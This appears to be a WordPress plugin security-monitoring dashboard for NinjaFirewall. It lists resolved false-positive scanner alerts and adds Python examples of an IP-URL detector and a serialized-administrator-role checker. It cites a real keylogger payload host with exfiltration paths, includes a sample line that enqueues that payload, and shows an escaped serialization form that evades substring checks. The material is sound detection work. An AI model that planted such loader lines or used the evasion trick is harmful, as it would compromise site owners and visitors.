NinjaFirewall (WP Edition) – Advanced Security Plugin and Firewall

ninjafirewall · by nintechnet · wordpress.org · SVN

Active installs: 100k+
Current version: 4.8.5
Added: 2013-03-30
Last updated: 2026-04-02 (1mo ago)
First seen by beacon: 11d ago
Total downloads: 3,195,878

Alerts (0)

No open alerts.

Resolved alerts (3)
Critical · code_pattern · Resolved (false_positive_legit_ip_use) · 2026-04-30 15:25:27 (2d ago)
Slug: ninjafirewall
Pattern: hardcoded_ip_url
Kind: builtin
Version: 4.8.5
Hit count: 1
First hit
  File: lib/help.php
  Line: 250
  Snippet: <p><strong>' . __('Block HTTP requests with an IP in the <code>HTTP_HOST</code> header', 'ninjafirewall'). '</strong><br />' . sprintf( __('This option will reject any request using an IP instead of
Explanation: plugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) — legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths.
Resolution note: the hit sits in the translatable help text for the plugin's own option that rejects requests carrying an IP address in the `HTTP_HOST` header (lib/help.php), not in code that issues a request to that address; that is what the false_positive_legit_ip_use resolution records.
Raw JSON:
{
    "slug": "ninjafirewall",
    "pattern": "hardcoded_ip_url",
    "kind": "builtin",
    "version": "4.8.5",
    "hit_count": 1,
    "first_hit": {
        "file": "lib/help.php",
        "line": 250,
        "snippet": "<p><strong>' . __('Block HTTP requests with an IP in the <code>HTTP_HOST</code> header', 'ninjafirewall'). '</strong><br />' . sprintf( __('This option will reject any request using an IP instead of"
    },
    "explanation": "plugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) \u2014 legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths."
}
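The `hardcoded_ip_url` check and the post-filter the explanation describes, re-implemented as an added example. This is not the beacon's scanner code and not NinjaFirewall's code: the regex, the function names and the sample files are assumptions, constructed for the demonstration; the 94.156.79.8 host is the one the explanation cites. The address test is stricter than the stated RFC1918/loopback/link-local list in that it also drops multicast, reserved and unspecified ranges. The last sample file shows the limit the resolution above records: the pattern fires on help text that merely mentions an IP URL exactly as it fires on code that loads one, so that distinction is left to triage.

```python
"""hardcoded_ip_url-style scan (added example, not the beacon's or NinjaFirewall's code).
Regex, names and sample files are assumptions constructed for the demo."""
import ipaddress
import re
from typing import Dict, List, Tuple

# http(s)://<dotted quad>[:port][/path]; the path stops at whitespace or quoting
IP_URL_RE = re.compile(
    r"""https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d{1,5})?(?:/[^\s'"<>]*)?"""
)

# Directory prefixes the scan skips: third-party code and test fixtures
SKIP_PATH_PREFIXES = ("vendor/", "tests/")

Hit = Tuple[int, str, str]  # (line number, ip, full url)


def is_routable_public(ip_text: str) -> bool:
    """True only for a public unicast IPv4 address. Rejects RFC1918, loopback and
    link-local as the explanation lists, plus multicast/reserved/unspecified and
    anything that is not a valid dotted quad (e.g. 999.1.1.1)."""
    try:
        ip = ipaddress.IPv4Address(ip_text)
    except ipaddress.AddressValueError:
        return False
    return not (
        ip.is_private or ip.is_loopback or ip.is_link_local
        or ip.is_multicast or ip.is_reserved or ip.is_unspecified
    )


def scan_file(path: str, lines: List[str]) -> List[Hit]:
    """Hits in one file that survive both the path and the address post-filter."""
    if path.startswith(SKIP_PATH_PREFIXES):
        return []
    hits: List[Hit] = []
    for lineno, line in enumerate(lines, start=1):
        for m in IP_URL_RE.finditer(line):
            if is_routable_public(m.group(1)):
                hits.append((lineno, m.group(1), m.group(0)))
    return hits


def scan_tree(files: Dict[str, List[str]]) -> Dict[str, List[Hit]]:
    """Map path -> hits, omitting files with none."""
    report: Dict[str, List[Hit]] = {}
    for path, lines in files.items():
        hits = scan_file(path, lines)
        if hits:
            report[path] = hits
    return report


# Constructed sample tree (not real plugin files)
SAMPLE_FILES = {
    # loader of the kind the explanation describes: JS payload pulled from a bare IP
    "includes/loader.php": [
        "<?php",
        "wp_enqueue_script('sw', 'https://94.156.79.8/sc-top.js', array(), null, true);",
    ],
    # dev leftover on a private range: dropped by the address filter
    "includes/debug.php": ["$debug_url = 'http://192.168.1.20/collect';"],
    # public address but under vendor/: dropped by the path filter
    "vendor/lib/client.php": ["$default = 'http://1.2.3.4/api';"],
    # help text that only mentions an IP URL: still a hit, so it needs human triage
    "lib/help.php": [
        "echo '<p>' . __('Example: a request for http://1.2.3.4/wp-login.php is rejected', 'ninjafirewall') . '</p>';",
    ],
}

if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLE_FILES).items():
        for lineno, ip, url in hits:
            print(f"{path}:{lineno}: {ip} in {url}")
```

A second signal is what separates the two surviving hits: whether the matched string is an argument to something that fetches or enqueues it, or a string inside a `__()` translation call. The regex alone cannot tell, which is why the dashboard records the help-text hit as a resolved false positive rather than filtering it out.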
Critical · code_pattern · Resolved (false_positive_defensive_string_check) · 2026-04-30 15:25:27 (2d ago)
Slug: ninjafirewall
Pattern: serialized_admin_role
Kind: builtin
Version: 4.8.5
Hit count: 1
First hit
  File: lib/utils.php
  Line: 1319
  Snippet: if ( strpos( $value, 's:13:"administrator"') === FALSE &&
Explanation: plugin source contains `s:13:"administrator"` — the PHP-serialized representation of the `administrator` role meta value. Used to bypass `wp_insert_user()` by writing directly to `wp_usermeta` with a hand-crafted capabilities string. Near-zero FP because legit code uses `WP_User::set_role()` instead of building the serialized form by hand.
Resolution note: the string is the needle of a strpos() test, i.e. lib/utils.php inspects a value for the administrator serialization rather than writing one; that is what the false_positive_defensive_string_check resolution records.
Raw JSON:
{
    "slug": "ninjafirewall",
    "pattern": "serialized_admin_role",
    "kind": "builtin",
    "version": "4.8.5",
    "hit_count": 1,
    "first_hit": {
        "file": "lib/utils.php",
        "line": 1319,
        "snippet": "if ( strpos( $value, 's:13:\"administrator\"') === FALSE &&"
    },
    "explanation": "plugin source contains `s:13:\"administrator\"` \u2014 the PHP-serialized representation of the `administrator` role meta value. Used to bypass `wp_insert_user()` by writing directly to `wp_usermeta` with a hand-crafted capabilities string. Near-zero FP because legit code uses `WP_User::set_role()` instead of building the serialized form by hand."
}
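What the `serialized_admin_role` pattern keys on, and why a check that decodes the meta value is stronger than a substring test, as an added example. This is not the beacon's pattern code and not NinjaFirewall's code: the decoder, the helper names and the sample meta values are constructed. The point it adds to the explanation is a property of PHP itself: unserialize() also accepts the escaped `S:` string form, so a value WordPress still reads as the administrator role need not contain the bytes `s:13:"administrator"`. Whether that affects the flagged check depends on the rest of the condition, which the snippet above truncates at `&&`.

```python
"""Detecting an administrator grant in a PHP-serialized wp_capabilities value
(added example, not the beacon's or NinjaFirewall's code; names and samples are constructed)."""
from typing import Any, Tuple


def _unserialize(data: str, pos: int = 0) -> Tuple[Any, int]:
    """Decode the subset of PHP's serialize() format used for role metadata:
    N; b:; i:; s:; the escaped S: string form; and a: arrays.
    Returns (value, position after the value)."""
    tag = data[pos]
    if tag == "N":
        return None, pos + 2
    if tag in "bi":
        end = data.index(";", pos)
        num = int(data[pos + 2:end])
        return (bool(num) if tag == "b" else num), end + 1
    if tag in "sS":
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])          # PHP counts decoded characters
        cursor = colon + 2                          # skip ':"'
        chars = []
        for _ in range(length):
            if tag == "S" and data[cursor] == "\\":
                chars.append(chr(int(data[cursor + 1:cursor + 3], 16)))  # \XX hex escape
                cursor += 3
            else:
                chars.append(data[cursor])
                cursor += 1
        if data[cursor:cursor + 2] != '";':
            raise ValueError("malformed string")
        return "".join(chars), cursor + 2
    if tag == "a":
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        cursor = colon + 2                          # skip ':{'
        result = {}
        for _ in range(count):
            key, cursor = _unserialize(data, cursor)
            value, cursor = _unserialize(data, cursor)
            result[key] = value
        if data[cursor] != "}":
            raise ValueError("malformed array")
        return result, cursor + 1
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")


def php_unserialize(data: str) -> Any:
    """Decode one complete serialized value; reject trailing bytes."""
    value, end = _unserialize(data, 0)
    if end != len(data):
        raise ValueError("trailing data after serialized value")
    return value


def naive_admin_check(meta_value: str) -> bool:
    """Substring test in the style of the flagged snippet."""
    return 's:13:"administrator"' in meta_value


def grants_admin(meta_value: str) -> bool:
    """Decode the value and look for a truthy 'administrator' key, which is how
    WordPress itself reads wp_capabilities. Malformed input is not a grant."""
    try:
        caps = php_unserialize(meta_value)
    except (ValueError, IndexError, TypeError):
        return False
    return isinstance(caps, dict) and bool(caps.get("administrator"))


# Constructed wp_usermeta values (not taken from any real site)
SAMPLES = {
    "plain_admin":   'a:1:{s:13:"administrator";b:1;}',
    "subscriber":    'a:1:{s:10:"subscriber";b:1;}',
    # PHP's S: form with \61 == 'a': same role, different bytes
    "escaped_admin": 'a:1:{S:13:"\\61dministrator";b:1;}',
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:14} substring={naive_admin_check(value)!s:5} decoded={grants_admin(value)}")
```

The two checks agree on the first two samples and disagree on the third, which is the caveat for any defensive string match on serialized data: decode first, then compare keys, rather than comparing bytes that the format allows to be spelled more than one way.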
Critical · code_scan_delta · Resolved (false_positive_cdn_known_good) · 2026-04-30 06:32:50 (2d ago)
Slug: ninjafirewall
Previous version: 4.8.5
Current version: 4.8.5
New findings (2)
Pattern | Kind | File | Line | Snippet | Confidence
hardcoded_ip_url | builtin | lib/help.php | 250 | <p><strong>' . __('Block HTTP requests with an IP in the <code>HTTP_HOST</code> header', 'ninjafirewall'). '</strong><br />' . sprintf( __('This option will reject any request using an IP instead of | high
serialized_admin_role | builtin | lib/utils.php | 1319 | if ( strpos( $value, 's:13:"administrator"') === FALSE && | high
New finding count: 2
Raw JSON:
{
    "slug": "ninjafirewall",
    "previous_version": "4.8.5",
    "current_version": "4.8.5",
    "new_findings": [
        {
            "pattern": "hardcoded_ip_url",
            "kind": "builtin",
            "file": "lib/help.php",
            "line": 250,
            "snippet": "<p><strong>' . __('Block HTTP requests with an IP in the <code>HTTP_HOST</code> header', 'ninjafirewall'). '</strong><br />' . sprintf( __('This option will reject any request using an IP instead of",
            "confidence": "high"
        },
        {
            "pattern": "serialized_admin_role",
            "kind": "builtin",
            "file": "lib/utils.php",
            "line": 1319,
            "snippet": "if ( strpos( $value, 's:13:\"administrator\"') === FALSE &&",
            "confidence": "high"
        }
    ],
    "new_finding_count": 2
}

SVN committers (1)

Accounts with actual commit access to ninjafirewall on plugins.svn.wordpress.org, reconstructed from svn log. This is the list that matters for ownership changes — not the readme contributors.

Committer Member since Commits First commit Latest commit
nintechnet 2013-02-14 200 2015-12-14 · r1307629 2026-04-02 · r3497353

Readme contributors (2)

Names the plugin's readme declares as contributors. A soft signal — anyone can be listed. The SVN access column is the ground-truth cross-reference: does this contributor actually commit code?

Contributor Member since SVN access Status
nintechnet 2013-02-14 200 commits Active
bruandet 2014-10-08 none Active

Versions (26 most recent)

Version Released
4.8.5 2026-04-02
4.8.4 2026-03-12
4.8.3 2026-01-18
4.8.2 2025-12-02
4.8.1 2025-10-25
4.8 2025-09-25
4.7.5 2025-06-13
4.7.4 2025-05-03
4.7.3 2025-04-11
4.7.2 2025-03-30
4.7.1 2024-11-27
4.7 2024-11-11
4.6.1 2024-11-03
4.6 2024-08-12
4.5.11 2024-07-07
4.5.10 2023-10-31
4.5.9 2023-10-25
4.5.8 2023-07-24
4.5.7 2023-04-13
4.5.6 2023-02-17
4.5.5 2022-11-26
4.5.4 2022-10-26
4.5.3 2022-09-07
4.5.2 2022-06-09
4.5.1 2022-05-09
4.5 2022-02-04